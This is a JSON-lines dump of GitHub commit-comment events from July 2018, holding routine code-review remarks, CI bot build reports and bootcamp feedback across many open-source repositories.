{"id":"8046324401","type":"CommitCommentEvent","actor":{"login":"AndyLindsay"},"repo":{"name":"parallaxinc/Simple-Libraries"},"payload":{"comment":{"id":29910609,"position":null,"line":null,"path":null,"commit_id":"1c4adc180a9e2fa8e46717022bf833f460ca95a3","created_at":"2018-07-31T19:55:45Z","updated_at":"2018-07-31T19:55:45Z","author_association":"CONTRIBUTOR","body":"You also might want to update version.txt"}},"created_at":"2018-07-31T19:55:45Z"}
{"id":"8046327045","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29910620,"position":3,"line":3,"path":"main.py","commit_id":"4bfbde2a3bef54f560c87253928290fa29fb9a7a","created_at":"2018-07-31T19:56:18Z","updated_at":"2018-07-31T19:56:18Z","author_association":"NONE","body":"```py\r\nif __name__ == '__main__':\r\n  ...\r\n```"}},"created_at":"2018-07-31T19:56:18Z"}
{"id":"8046331674","type":"CommitCommentEvent","actor":{"login":"hcho3"},"repo":{"name":"dmlc/dmlc-core"},"payload":{"comment":{"id":29910630,"position":1,"line":1,"path":"include/dmlc/build_config.h","commit_id":"b47b38e4546e1d9409387a9e55b100d6b76888b3","created_at":"2018-07-31T19:57:14Z","updated_at":"2018-07-31T19:57:14Z","author_association":"CONTRIBUTOR","body":"You should remove this line, since by default `FOPEN_64_PRESENT` would be 0."}},"created_at":"2018-07-31T19:57:14Z"}
{"id":"8046337544","type":"CommitCommentEvent","actor":{"login":"bobwolff68"},"repo":{"name":"FRCTeam1967/FRCTeam1967"},"payload":{"comment":{"id":29910651,"position":null,"line":null,"path":null,"commit_id":"d314cafd066ee3e930c565b9428830cf2f6ed060","created_at":"2018-07-31T19:58:24Z","updated_at":"2018-07-31T19:58:24Z","author_association":"CONTRIBUTOR","body":"Question - what makes this position control different from last year's autonomous position control?"}},"created_at":"2018-07-31T19:58:24Z"}
{"id":"8046341560","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29910664,"position":12,"line":12,"path":"week_five/les10/Ex1/ThreadTwo.java","commit_id":"9195fb734dd157aeb825bb53ba4b0792c23a9dad","created_at":"2018-07-31T19:59:12Z","updated_at":"2018-07-31T19:59:12Z","author_association":"OWNER","body":"Добре було б мати один клас замість двох практично однакових і подумати які параметри слід туди передати"}},"created_at":"2018-07-31T19:59:12Z"}
{"id":"8046344131","type":"CommitCommentEvent","actor":{"login":"CyrusNajmabadi"},"repo":{"name":"dotnet/roslyn"},"payload":{"comment":{"id":29910672,"position":75,"line":75,"path":"src/EditorFeatures/Test2/Rename/CSharp/OverrideTests.vb","commit_id":"1d0298988a5f6329db80e7cb5b5b4dc50991dd68","created_at":"2018-07-31T19:59:43Z","updated_at":"2018-07-31T19:59:43Z","author_association":"CONTRIBUTOR","body":"what about tests with abstract+override, or abstract+virtual?  "}},"created_at":"2018-07-31T19:59:43Z"}
{"id":"8046344564","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29910673,"position":468,"line":462,"path":"Lesson_6/lib/main_menu.rb","commit_id":"682b47621761305058ff8a7c9355435982857215","created_at":"2018-07-31T19:59:48Z","updated_at":"2018-07-31T19:59:48Z","author_association":"NONE","body":"это скорее в АутпутХелпер надо отправлять, это ж по идее в чистом виде метод аутпута\r\nи аргументы ты в него передаешь, а лучше сделать как с методом `message` - передавать ключ, а аргументы забирать из хеша\r\n\"экстра лайнз\" похоже возможна только в одном варианте? \"выход\" \r\nесли так, то наверное и \"экстра лайнз\" лучше переименовать как-то ближе к теме"}},"created_at":"2018-07-31T19:59:48Z"}
{"id":"8046344616","type":"CommitCommentEvent","actor":{"login":"fantapop"},"repo":{"name":"cyrus-and/chrome-remote-interface"},"payload":{"comment":{"id":29910674,"position":4,"line":30,"path":"package.json","commit_id":"ba0dbab52cdf43a4b4cc62e36184f8c07804b07f","created_at":"2018-07-31T19:59:48Z","updated_at":"2018-07-31T19:59:48Z","author_association":"NONE","body":"@cyrus-and is this required here as a dependency vs a devDependency?  I noticed  my build was puling in various babel packages and I was just wondering."}},"created_at":"2018-07-31T19:59:48Z"}
{"id":"8041284286","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29896786,"position":61,"line":413,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"434a0d173c451cafa6815aca8d0093f7724f66d7","created_at":"2018-07-31T02:00:47Z","updated_at":"2018-07-31T02:00:47Z","author_association":"COLLABORATOR","body":"There is a new commit that gets the auto-correlations back to where they were (I think).  I can also stop playing around with things for a while if you need to merge in some things."}},"created_at":"2018-07-31T02:00:47Z"}
{"id":"8041284361","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29896788,"position":206,"line":159,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-31T02:00:49Z","updated_at":"2018-07-31T02:00:49Z","author_association":"OWNER","body":"plus easier to test when the methods are single purposed"}},"created_at":"2018-07-31T02:00:49Z"}
{"id":"8041285073","type":"CommitCommentEvent","actor":{"login":"AlicanC"},"repo":{"name":"facebook/relay"},"payload":{"comment":{"id":29896790,"position":null,"line":null,"path":null,"commit_id":"9d71698d575b9e917cf5b3b0ad197858bc0af8dc","created_at":"2018-07-31T02:01:06Z","updated_at":"2018-07-31T02:01:06Z","author_association":"NONE","body":"This change broke our app since there is no `RelayRuntime.js` in the package:\r\n```\r\n> yarn add relay-runtime\r\n...\r\n> ls node_modules/relay-runtime\r\nLICENSE              index.js             lib                  package.json         relay-runtime.js     relay-runtime.min.js\r\n```\r\n\r\nThis is the error that Metro gave me:\r\n```\r\nerror: bundling failed: Error: While trying to resolve module `relay-runtime` from file `/bleh/js/helpers/bleh.js`, the package `/bleh/node_modules/relay-runtime/package.json` was successfully found. However, this package itself specifies a `main` module field that could not be resolved (`/bleh/node_modules/relay-runtime/RelayRuntime.js`.\r\n```"}},"created_at":"2018-07-31T02:01:06Z"}
{"id":"8041288055","type":"CommitCommentEvent","actor":{"login":"null-007"},"repo":{"name":"pouchcontainer/blog"},"payload":{"comment":{"id":29896795,"position":null,"line":null,"path":null,"commit_id":"92ee9ae6227947185cdc185502afa57b663fd485","created_at":"2018-07-31T02:02:12Z","updated_at":"2018-07-31T02:02:12Z","author_association":"NONE","body":"266期7组提交"}},"created_at":"2018-07-31T02:02:12Z"}
{"id":"8041292788","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"davereichardt/Sprint-Challenge--User-Interface"},"payload":{"comment":{"id":29896808,"position":21,"line":18,"path":"about.html","commit_id":"58d479157d09ccc943c54910219468c37e53031d","created_at":"2018-07-31T02:04:00Z","updated_at":"2018-07-31T02:04:00Z","author_association":"NONE","body":"This path is relative to D so if you load it somewhere else, the image might not load. We can go over this during our 1:1 :)"}},"created_at":"2018-07-31T02:04:00Z"}
{"id":"8041295380","type":"CommitCommentEvent","actor":{"login":"Rami12216"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":29896822,"position":1,"line":340,"path":"src/app/ui/palette_view.cpp","commit_id":"c7071a52db634df2ef978eb5dd89834bf0084229","created_at":"2018-07-31T02:05:02Z","updated_at":"2018-07-31T02:05:02Z","author_association":"NONE","body":"Ramizaid1221@gmail.com"}},"created_at":"2018-07-31T02:05:02Z"}
{"id":"8041295982","type":"CommitCommentEvent","actor":{"login":"Rami12216"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":29896823,"position":7,"line":346,"path":"src/app/ui/palette_view.cpp","commit_id":"c7071a52db634df2ef978eb5dd89834bf0084229","created_at":"2018-07-31T02:05:15Z","updated_at":"2018-07-31T02:05:15Z","author_association":"NONE","body":"Ramizaid1221@gmail.com "}},"created_at":"2018-07-31T02:05:15Z"}
{"id":"8041299694","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29896843,"position":61,"line":413,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"434a0d173c451cafa6815aca8d0093f7724f66d7","created_at":"2018-07-31T02:06:41Z","updated_at":"2018-07-31T02:06:41Z","author_association":"COLLABORATOR","body":"If you can wait for me merge all this stuff in, then that will save me a massive headache. I’ll check the autocorrelations when I get a chance. My next major item after this GPU Imaging block is finished is to optimise those as we don’t need to grid them every time stamp I’ve realised.\n\n> On 30 Jul 2018, at 19:00, jaycedowell <notifications@github.com> wrote:\n> \n> There is a new commit that gets the auto-correlations back to where they were (I think). I can also stop playing around with things for a while if you need to merge in some things.\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/nithyanandan/EPIC/commit/434a0d173c451cafa6815aca8d0093f7724f66d7#commitcomment-29896786>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AB73hHApe9pE4wG6sMYIBuQj1AfE0WUSks5uL7pQgaJpZM4VncqB>.\n> \n\n"}},"created_at":"2018-07-31T02:06:41Z"}
{"id":"8041301545","type":"CommitCommentEvent","actor":{"login":"saxmydix"},"repo":{"name":"crdroidandroid/android_vendor_crDroidOTA"},"payload":{"comment":{"id":29896846,"position":32,"line":946,"path":"update.xml","commit_id":"e6d8e0d1bc3f271fdc9fbb0efab2058af4b6495b","created_at":"2018-07-31T02:07:17Z","updated_at":"2018-07-31T02:07:17Z","author_association":"CONTRIBUTOR","body":"noted"}},"created_at":"2018-07-31T02:07:17Z"}
{"id":"8041301814","type":"CommitCommentEvent","actor":{"login":"dennyak47"},"repo":{"name":"primefaces/primeng"},"payload":{"comment":{"id":29896849,"position":69,"line":67,"path":"src/app/components/password/password.ts","commit_id":"f3fc12097e9e18376c68ca7c0e3ba8a3ae68200f","created_at":"2018-07-31T02:07:23Z","updated_at":"2018-07-31T02:07:23Z","author_association":"NONE","body":"feedback condition do not work. here shoud be\r\n`if (this.feedback&&!this.panel)`"}},"created_at":"2018-07-31T02:07:23Z"}
{"id":"8041305299","type":"CommitCommentEvent","actor":{"login":"pcfreak9000"},"repo":{"name":"OmniKryptec/OmniKryptec-Engine"},"payload":{"comment":{"id":29896858,"position":null,"line":null,"path":null,"commit_id":"0cb5bdc0b6a949f03891a89cc88d4d8165c0a87d","created_at":"2018-07-31T02:08:27Z","updated_at":"2018-07-31T02:08:27Z","author_association":"COLLABORATOR","body":"because!"}},"created_at":"2018-07-31T02:08:27Z"}
{"id":"8041306123","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29896861,"position":null,"line":null,"path":null,"commit_id":"98e879f9967598d7a26576f0f45438584eea5206","created_at":"2018-07-31T02:08:39Z","updated_at":"2018-07-31T02:08:39Z","author_association":"NONE","body":"expanded-runperiod (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2955 of 2957 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nInputProcessorFixture Test Summary\n * Passed: 51\n * Failed: 1\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-98e879f9967598d7a26576f0f45438584eea5206-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-98e879f9967598d7a26576f0f45438584eea5206-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-31T02:08:39Z"}
{"id":"8041306731","type":"CommitCommentEvent","actor":{"login":"jose807"},"repo":{"name":"SteelSeries/gamesense-sdk"},"payload":{"comment":{"id":29896862,"position":null,"line":null,"path":null,"commit_id":"da1dc9332b2808489d0cdecd1b7e620fc567f962","created_at":"2018-07-31T02:08:50Z","updated_at":"2018-07-31T02:08:50Z","author_association":"NONE","body":"podrian crear un evento, osea asi como estan las configuraciones de juegos como cs go, crear uno para crossfire español, para recibir notificaciones del juego y poder llevar un conteo como las muertes, la salud y ese tipo de cosas?"}},"created_at":"2018-07-31T02:08:50Z"}
{"id":"8041308849","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29896870,"position":61,"line":413,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"434a0d173c451cafa6815aca8d0093f7724f66d7","created_at":"2018-07-31T02:09:30Z","updated_at":"2018-07-31T02:09:30Z","author_association":"COLLABORATOR","body":"That works for me.  Just let me know when you've put all of your pieces in place."}},"created_at":"2018-07-31T02:09:30Z"}
{"id":"8041308904","type":"CommitCommentEvent","actor":{"login":"adamclayman"},"repo":{"name":"adamclayman/fakepay-alpha2"},"payload":{"comment":{"id":29896871,"position":null,"line":null,"path":null,"commit_id":"0462ef4f14255150bf1827552bc56595d7f59ed8","created_at":"2018-07-31T02:09:31Z","updated_at":"2018-07-31T02:09:31Z","author_association":"OWNER","body":"Unfortunately, I can't make these _entirely_ consistent, because of the way the en.yaml file is represented and processed .... the success message must be enclosed in quotes (\"null\" or \"nil\") to prevent a translation not found error. As a result, while the success message reads as \"null\", the 6 error payloads read as null (sans string quotations). When processed with JSON.parse(), these are equivalent, but theoretically, if left unprocessed, or if processed by a different front-end environment, these two values (null and \"null\") might cause some unexpected results."}},"created_at":"2018-07-31T02:09:31Z"}
{"id":"8041309954","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"juliejonak/Sprint-Challenge--User-Interface"},"payload":{"comment":{"id":29896873,"position":null,"line":null,"path":null,"commit_id":"5d594afcf768d785964b5bd82f857be8360abe22","created_at":"2018-07-31T02:09:51Z","updated_at":"2018-07-31T02:09:51Z","author_association":"NONE","body":"Great answers, Julie!"}},"created_at":"2018-07-31T02:09:51Z"}
{"id":"8041310563","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MEWconnect-landing-page"},"payload":{"comment":{"id":29896876,"position":null,"line":null,"path":null,"commit_id":"88d932e064676cbfca98deed406c8222c4c89f29","created_at":"2018-07-31T02:10:02Z","updated_at":"2018-07-31T02:10:02Z","author_association":"NONE","body":"Copy of this build can be found at https://mewc.mewbuilds.com/build/88d932e064676cbfca98deed406c8222c4c89f29/index.html"}},"created_at":"2018-07-31T02:10:02Z"}
{"id":"8041311376","type":"CommitCommentEvent","actor":{"login":"pcfreak9000"},"repo":{"name":"OmniKryptec/OmniKryptec-Engine"},"payload":{"comment":{"id":29896883,"position":null,"line":null,"path":null,"commit_id":"6230c29e4f6aa44f61e80e877473653adf9aae4e","created_at":"2018-07-31T02:10:16Z","updated_at":"2018-07-31T02:10:16Z","author_association":"COLLABORATOR","body":"WTF?"}},"created_at":"2018-07-31T02:10:16Z"}
{"id":"8041313845","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29896895,"position":null,"line":null,"path":null,"commit_id":"4c51d62b5318d9686058be09f0d710f58d61f917","created_at":"2018-07-31T02:11:05Z","updated_at":"2018-07-31T02:11:05Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-MacOS-10.9-clang: Tests Failed (1389 of 2964 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 628\n\nregression Test Summary\n * Passed: 625\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4c51d62b5318d9686058be09f0d710f58d61f917-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4c51d62b5318d9686058be09f0d710f58d61f917-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-46.86%25-red.png)</a> \n"}},"created_at":"2018-07-31T02:11:05Z"}
{"id":"8041318429","type":"CommitCommentEvent","actor":{"login":"troy351"},"repo":{"name":"vuejs/vue-cli"},"payload":{"comment":{"id":29896906,"position":19,"line":47,"path":"packages/@vue/cli-plugin-typescript/lib/tslint.js","commit_id":"2a216126f1c057deb8b2431278512fbb6bf0e133","created_at":"2018-07-31T02:12:46Z","updated_at":"2018-07-31T02:12:46Z","author_association":"CONTRIBUTOR","body":"should `tsx` to be added too?"}},"created_at":"2018-07-31T02:12:46Z"}
{"id":"8041324378","type":"CommitCommentEvent","actor":{"login":"runer112"},"repo":{"name":"CE-Programming/libload"},"payload":{"comment":{"id":29896923,"position":null,"line":null,"path":null,"commit_id":"90d237352d989d13aa366085b9a6a150046c7e97","created_at":"2018-07-31T02:14:55Z","updated_at":"2018-07-31T02:14:55Z","author_association":"MEMBER","body":"You're welcome"}},"created_at":"2018-07-31T02:14:55Z"}
{"id":"8041329017","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"juliejonak/Sprint-Challenge--User-Interface"},"payload":{"comment":{"id":29896936,"position":null,"line":null,"path":null,"commit_id":"f65074573054736e75d9b61c2f7b6e6b3d1d99a2","created_at":"2018-07-31T02:16:41Z","updated_at":"2018-07-31T02:16:41Z","author_association":"NONE","body":"Great job on the boxes. What factored into choosing ids over classes?"}},"created_at":"2018-07-31T02:16:41Z"}
{"id":"8041329470","type":"CommitCommentEvent","actor":{"login":"zhuyaliang"},"repo":{"name":"zhuyaliang/user-admin"},"payload":{"comment":{"id":29896937,"position":null,"line":null,"path":null,"commit_id":"b4d08c64d6e7eea5cd3690d62862fe1cdbbea7a0","created_at":"2018-07-31T02:16:51Z","updated_at":"2018-07-31T02:16:51Z","author_association":"OWNER","body":"切换语言时也需要处理一下 \r\n--- user-baseback.c 2018-07-31 10:11:03.368980433 +0800\r\n  2 +++ user-base.c 2018-07-31 10:14:38.015658994 +0800\r\n  3 @@ -93,10 +93,7 @@\r\n  4      {\r\n  5          account_type =  gtk_combo_box_get_active (GTK_COMBO_BOX(widget));\r\n  6          ua->ul[gnCurrentUserIndex].LangType = account_type;\r\n  7 -       if(account_type == 1)\r\n  8 -            act_user_set_language(ua->ul[gnCurrentUserIndex].User,\"en_US.UTF-8\");\r\n  9 -        else\r\n 10 -            act_user_set_language(ua->ul[gnCurrentUserIndex].User,\"zh_CN.UTF-8\");\r\n 11 +        act_user_set_language(ua->ul[gnCurrentUserIndex].User,all_languages[account_type]);\r\n 12      }\r\n 13  }\r\n"}},"created_at":"2018-07-31T02:16:51Z"}
{"id":"8041330315","type":"CommitCommentEvent","actor":{"login":"quinnj"},"repo":{"name":"JuliaNLSolvers/NLsolve.jl"},"payload":{"comment":{"id":29896941,"position":5,"line":36,"path":"test/runtests.jl","commit_id":"604be5f9101cf61f29b3f1e5cf4f1227fe213d0d","created_at":"2018-07-31T02:17:11Z","updated_at":"2018-07-31T02:17:11Z","author_association":"NONE","body":"was this meant to be left commented out?"}},"created_at":"2018-07-31T02:17:11Z"}
{"id":"8041333808","type":"CommitCommentEvent","actor":{"login":"YuanLiou"},"repo":{"name":"YuanLiou/CoffeeTrip"},"payload":{"comment":{"id":29896943,"position":104,"line":254,"path":"app/src/main/java/tw/com/louis383/coffeefinder/mainpage/MainActivity.kt","commit_id":"a79651be04dc85c39fd1b074c25074b3a281dc31","created_at":"2018-07-31T02:18:28Z","updated_at":"2018-07-31T02:18:28Z","author_association":"OWNER","body":"不用判斷兩次"}},"created_at":"2018-07-31T02:18:28Z"}
{"id":"8041335827","type":"CommitCommentEvent","actor":{"login":"quinnj"},"repo":{"name":"JuliaAlgebra/StaticPolynomials.jl"},"payload":{"comment":{"id":29896949,"position":5,"line":8,"path":".travis.yml","commit_id":"73d4eacc559d11266d4f1e4afc5d35485ba44033","created_at":"2018-07-31T02:19:13Z","updated_at":"2018-07-31T02:19:13Z","author_association":"NONE","body":"You can still test on `nightly` in addition to `0.7`."}},"created_at":"2018-07-31T02:19:13Z"}
{"id":"8041353561","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"juliejonak/Sprint-Challenge--User-Interface"},"payload":{"comment":{"id":29896971,"position":null,"line":null,"path":null,"commit_id":"f9458af7e2721d630d7ba984e465a4ea120c9e3c","created_at":"2018-07-31T02:25:50Z","updated_at":"2018-07-31T02:25:50Z","author_association":"NONE","body":"I am impressed by that contact form! It looks great and the form is even highlighted when you click on its label. Awesome job, Julie! "}},"created_at":"2018-07-31T02:25:50Z"}
{"id":"8041354853","type":"CommitCommentEvent","actor":{"login":"yjqiang"},"repo":{"name":"yjqiang/bilibili-live-tools"},"payload":{"comment":{"id":29896976,"position":null,"line":null,"path":null,"commit_id":"4521d3f05ae900ff708f1389149160cf2d67526e","created_at":"2018-07-31T02:26:18Z","updated_at":"2018-07-31T02:26:18Z","author_association":"OWNER","body":"#79 "}},"created_at":"2018-07-31T02:26:18Z"}
{"id":"8041358182","type":"CommitCommentEvent","actor":{"login":"kholia"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":29896981,"position":9,"line":569,"path":"src/dynamic_compiler.c","commit_id":"bf2048be86c352efdd02b107687a464937c81bd3","created_at":"2018-07-31T02:27:33Z","updated_at":"2018-07-31T02:27:33Z","author_association":"COLLABORATOR","body":"Yes, this change could be performance critical. I think `memset()` is required here to ensure proper trailing zero-padding of appropriate size.\r\n\r\nI could not find an alternate way to make GCC 8 like this code. "}},"created_at":"2018-07-31T02:27:33Z"}
{"id":"8041358211","type":"CommitCommentEvent","actor":{"login":"quinnj"},"repo":{"name":"JuliaStats/Loess.jl"},"payload":{"comment":{"id":29896982,"position":6,"line":6,"path":".travis.yml","commit_id":"59c0e94d244caa105d29a8be3010805e6ecb37b7","created_at":"2018-07-31T02:27:34Z","updated_at":"2018-07-31T02:27:34Z","author_association":"MEMBER","body":"you probably want to test this on `nightly` as well, at least for the moment since `nightly` is tracking the almost `-rc1` and 0.7 is a bit out-dated. Would probably help just to make sure you're totally ready for 0.7/1.0."}},"created_at":"2018-07-31T02:27:34Z"}
{"id":"8041359642","type":"CommitCommentEvent","actor":{"login":"SolanaO"},"repo":{"name":"SolanaO/donors_for_CharityML"},"payload":{"comment":{"id":29896983,"position":null,"line":null,"path":null,"commit_id":"0fcba91e1b8b64b6010193e14fc7dfef84fef68c","created_at":"2018-07-31T02:28:05Z","updated_at":"2018-07-31T02:28:05Z","author_association":"OWNER","body":"update with random state and more tuning parameters"}},"created_at":"2018-07-31T02:28:05Z"}
{"id":"8041362142","type":"CommitCommentEvent","actor":{"login":"cup"},"repo":{"name":"stedolan/crowbar"},"payload":{"comment":{"id":29896984,"position":null,"line":null,"path":null,"commit_id":"3beb78b56659a926e10ce0a4e436141e4381b510","created_at":"2018-07-31T02:28:57Z","updated_at":"2018-07-31T02:28:57Z","author_association":"NONE","body":"@stedolan sorry to bother you but i emailed you last month with no reply\r\n\r\ni am interested to be added as collaborator for JQ\r\n\r\nhere are my contributions\r\n\r\nhttp://github.com/stedolan/jq/issues?q=author:cup"}},"created_at":"2018-07-31T02:28:57Z"}
{"id":"8041363939","type":"CommitCommentEvent","actor":{"login":"saulpw"},"repo":{"name":"saulpw/visidata"},"payload":{"comment":{"id":29896987,"position":5,"line":2566,"path":"visidata/vdtui.py","commit_id":"874d67632fd175e7c71e8ef6611f1861b926e753","created_at":"2018-07-31T02:29:39Z","updated_at":"2018-07-31T02:29:39Z","author_association":"OWNER","body":"Let's use `Ctrl+H` to be friendlier to beginners. We can drop the `<F1>` from the message I think too, because `Ctrl+H` is suitably mnemonic and confusingly doesn't work on Mac anyway."}},"created_at":"2018-07-31T02:29:39Z"}
{"id":"8041365365","type":"CommitCommentEvent","actor":{"login":"kholia"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":29896992,"position":9,"line":569,"path":"src/dynamic_compiler.c","commit_id":"bf2048be86c352efdd02b107687a464937c81bd3","created_at":"2018-07-31T02:30:10Z","updated_at":"2018-07-31T02:30:10Z","author_association":"COLLABORATOR","body":"> What we should have done was add compiler flags to stop gcc from being a fucktard.\r\n\r\nI can now see the advantages of this approach.\r\n\r\n> I wonder how many more problems you introduced here and in later commits?\r\n\r\nHopefully, nothing that can't be fixed.\r\n"}},"created_at":"2018-07-31T02:30:10Z"}
{"id":"8041369859","type":"CommitCommentEvent","actor":{"login":"quinnj"},"repo":{"name":"JuliaInterop/CxxWrap.jl"},"payload":{"comment":{"id":29897002,"position":5,"line":157,"path":"README.md","commit_id":"16cb0518ece8e85e1cc7dcb6cc68a31fd6987a9b","created_at":"2018-07-31T02:31:48Z","updated_at":"2018-07-31T02:31:48Z","author_association":"NONE","body":"These can also be `Cvoid`, which might read a little more friendly for the C-interop story here."}},"created_at":"2018-07-31T02:31:48Z"}
{"id":"8041373119","type":"CommitCommentEvent","actor":{"login":"quinnj"},"repo":{"name":"JuliaInterop/CxxWrap.jl"},"payload":{"comment":{"id":29897010,"position":17,"line":6,"path":".travis.yml","commit_id":"c2efab23dbe4fa46aaae7d698d01e46ee3c9a76e","created_at":"2018-07-31T02:32:56Z","updated_at":"2018-07-31T02:32:56Z","author_association":"NONE","body":"is this only testing 0.7 for linux and only `nightly` for osx? is that intended? why not test both `0.7` and `nightly` for both linux and osx?"}},"created_at":"2018-07-31T02:32:56Z"}
{"id":"8041375255","type":"CommitCommentEvent","actor":{"login":"Cutthroat1"},"repo":{"name":"Cutthroat1/hello-world"},"payload":{"comment":{"id":29897011,"position":null,"line":null,"path":null,"commit_id":"fd52a648bccd162c042ffd4cab66dc34d870b592","created_at":"2018-07-31T02:33:45Z","updated_at":"2018-07-31T02:33:45Z","author_association":"OWNER","body":"https://drive.google.com/file/d/1ioID4JH3XZqvhS2yYTIxB24-_Sbq4DKk/view?usp=drivesdk"}},"created_at":"2018-07-31T02:33:45Z"}
{"id":"8041386458","type":"CommitCommentEvent","actor":{"login":"kaniini"},"repo":{"name":"kaniini/antissh"},"payload":{"comment":{"id":29897022,"position":5,"line":8,"path":"antissh.conf.example","commit_id":"f6a3985fb6f24cb87ee8dfe3f013c29363cc11d6","created_at":"2018-07-31T02:38:02Z","updated_at":"2018-07-31T02:38:02Z","author_association":"OWNER","body":"nah, it turns out its not needed"}},"created_at":"2018-07-31T02:38:02Z"}
{"id":"8041391950","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29897035,"position":null,"line":null,"path":null,"commit_id":"a22210bc6d70745c0319b9e25f3ccaa7ee79bcad","created_at":"2018-07-31T02:40:03Z","updated_at":"2018-07-31T02:40:03Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/a22210bc6d70745c0319b9e25f3ccaa7ee79bcad/index.html"}},"created_at":"2018-07-31T02:40:03Z"}
{"id":"8041392385","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29897036,"position":126,"line":743,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"4b377b825baebbe6dbeea0cb50fe6ff8623d06ee","created_at":"2018-07-31T02:40:13Z","updated_at":"2018-07-31T02:40:13Z","author_association":"COLLABORATOR","body":"@jaycedowell Apparently complexes aren't supported for this reduction operation? This seems like quite a big oversight? The documentation definitely says only reals are supported which kind of confuses me as sum-reducing a complex number is pretty useful. "}},"created_at":"2018-07-31T02:40:13Z"}
{"id":"8041393068","type":"CommitCommentEvent","actor":{"login":"BlindingDark"},"repo":{"name":"zhew2013/elixir-china"},"payload":{"comment":{"id":29897037,"position":null,"line":null,"path":null,"commit_id":"46789820893b1081ae8745cdfecbc78cef678df9","created_at":"2018-07-31T02:40:27Z","updated_at":"2018-07-31T02:40:27Z","author_association":"NONE","body":"差一天没赶上 =-="}},"created_at":"2018-07-31T02:40:27Z"}
{"id":"8041394074","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29897040,"position":126,"line":743,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"4b377b825baebbe6dbeea0cb50fe6ff8623d06ee","created_at":"2018-07-31T02:40:51Z","updated_at":"2018-07-31T02:40:51Z","author_association":"COLLABORATOR","body":"I can probably get around it by just doing the re-casting jiggery pokery but is a definite fudge."}},"created_at":"2018-07-31T02:40:51Z"}
{"id":"8041394567","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"kyleteeter/Sprint-Challenge--User-Interface"},"payload":{"comment":{"id":29897041,"position":16,"line":16,"path":"Answers.md","commit_id":"a4c34f12c30b866272ce7744fcaf188c52beb255","created_at":"2018-07-31T02:41:01Z","updated_at":"2018-07-31T02:41:01Z","author_association":"NONE","body":"Great job on the answers, Kyle. Just one thing I would like to clarify, align items works on the cross axis. \r\n"}},"created_at":"2018-07-31T02:41:01Z"}
{"id":"8041396984","type":"CommitCommentEvent","actor":{"login":"Cutthroat1"},"repo":{"name":"Cutthroat1/hello-world"},"payload":{"comment":{"id":29897045,"position":null,"line":null,"path":null,"commit_id":"fd52a648bccd162c042ffd4cab66dc34d870b592","created_at":"2018-07-31T02:41:54Z","updated_at":"2018-07-31T02:41:54Z","author_association":"OWNER","body":"https://drive.google.com/file/d/1ioID4JH3XZqvhS2yYTIxB24-_Sbq4DKk/view?usp=drivesdk"}},"created_at":"2018-07-31T02:41:54Z"}
